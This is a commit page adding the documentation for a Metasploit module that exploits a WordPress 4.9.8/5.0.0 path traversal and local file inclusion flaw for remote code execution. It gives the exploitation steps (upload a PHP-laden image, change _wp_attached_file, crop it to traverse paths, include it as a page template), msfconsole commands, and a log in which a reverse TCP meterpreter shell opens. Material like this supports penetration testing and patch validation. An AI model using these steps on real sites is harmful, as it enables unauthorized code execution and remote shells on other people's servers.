Land #11587, add Wordpress core RCE module
This commit is contained in:
Shelby Pace
@@ -0,0 +1,58 @@
|
||||
On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion.
|
||||
An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.
|
||||
|
||||
## Exploitation Steps
|
||||
|
||||
1. Upload an image containing PHP code
|
||||
2. Edit the `_wp_attached_file` entry from `meta_input` $_POST array to specify an arbitrary path
|
||||
3. Perform the Path Traversal by using the `crop-image` Wordpress function
|
||||
4. Perform the Local File Inclusion by creating a new WordPress post and set `_wp_page_template` value to the cropped image. The post will `include()` our image containing PHP code.
|
||||
|
||||
When visiting the post created by the attacker it is possible to obtain code execudion.
|
||||
|
||||
More details can be found on [RIPS Technology Blog](https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Confirm that functionality works:
|
||||
1. Start `msfconsole`
|
||||
2. `use exploit/multi/http/wp_crop_rce`
|
||||
3. Set the `RHOST`
|
||||
4. Set `USERNAME` and `PASSWORD`
|
||||
4. Set `LHOST` and `LPORT`
|
||||
5. Run the exploit: `run`
|
||||
6. Confirm you have now a meterpreter session
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ubuntu 18.04 running WordPress 4.9.8
|
||||
|
||||
```
|
||||
msf5 > use exploit/multi/http/wp_crop_rce
|
||||
msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf5 exploit(multi/http/wp_crop_rce) > set username author
|
||||
username => author
|
||||
msf5 exploit(multi/http/wp_crop_rce) > set password author
|
||||
password => author
|
||||
msf5 exploit(multi/http/wp_crop_rce) > run
|
||||
|
||||
[*] Started reverse TCP handler on 127.0.0.1:4444
|
||||
[*] Authenticating with WordPress using author:author...
|
||||
[+] Authenticated with WordPress
|
||||
[*] Preparing payload...
|
||||
[*] Checking crop library
|
||||
[*] Uploading payload
|
||||
[+] Image uploaded
|
||||
[*] Uploading payload
|
||||
[+] Image uploaded
|
||||
[*] Including into theme
|
||||
[*] Sending stage (38247 bytes) to 127.0.0.1
|
||||
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : ubuntu
|
||||
OS : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
|
||||
Meterpreter : php/linux
|
||||
```
|
||||
Reference in New Issue
Block a user